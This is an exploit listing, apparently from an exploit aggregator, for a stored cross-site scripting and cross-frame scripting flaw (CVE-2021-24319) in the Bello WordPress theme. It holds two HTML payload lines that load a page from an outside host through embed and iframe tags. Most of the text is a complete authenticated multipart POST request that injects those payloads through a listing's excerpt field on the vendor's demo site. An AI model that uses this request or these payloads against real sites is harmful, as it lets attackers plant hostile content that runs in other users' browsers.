Exploit for Bello < 1.6.0 - Authenticated Cross-Site Scripting (XSS) and XFS CVE-2021-24319

Name: Exploit for Bello < 1.6.0 - Authenticated Cross-Site Scripting (XSS) and XFS CVE-2021-24319
Rating: 5 (68 reviews)
2021-05-16 | CVSS 3.5
## https://sploitus.com/exploit?id=WPEX-ID:2C274EB7-25F1-49D4-A2C8-8CE8CECEBE68
### -- [ Payloads: ]

[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html>

[$] <!--><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>



### -- [ PoC | Authenticated XFS | My Listings: ]

[!] POST /main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115 HTTP/1.1
Host: bello.bold-themes.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------16118302073611242382926219402
Content-Length: 13779
Referer: https://bello.bold-themes.com/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
Cookie: [user cookies]

-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="action"

ajax_submit
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_form_config"

5d63602a0e2f80c83196bc5ea6405fca
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_title"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_content"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="post_excerpt"

</textarea><!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>
<iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_thumbnail_id"

7316
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="nonce_listing_cf"

e1c3b088fu
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="_wp_http_referer"

/main-demo/shop/my-account/bello-listing-endpoint/?listing_id=7317&cat=115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-location_position"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-region"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_from"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_to"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-price_free"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[0][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[1][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[2][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[3][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[4][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[5][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][start2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-working_time[6][end2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_address"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_phone"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_mobile"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_website"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_price"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_description"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_facebook"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_twitter"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_instagram"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_google_plus"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_pinterest"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_tripadvisor"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-social_youtube"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-faq"

13
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_free_wifi"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_air_conditioned"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_featured"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_exterior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_interior"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_pools"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_beach"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_images_spa"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_sound"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_2"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_video_3"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-media_audio_1"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[0]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[1]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[2]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[3]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[4]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-timekit[5]"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-bello-listing-package"

bello-default-package
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-contact_form_email"


-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_restaurant"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-amenities_hostel_non_smoking_rooms"

1
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

49
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="boldthemes_theme_listing-category-115[]"

115
-----------------------------16118302073611242382926219402
Content-Disposition: form-data; name="rwmb_submit"

1
-----------------------------16118302073611242382926219402--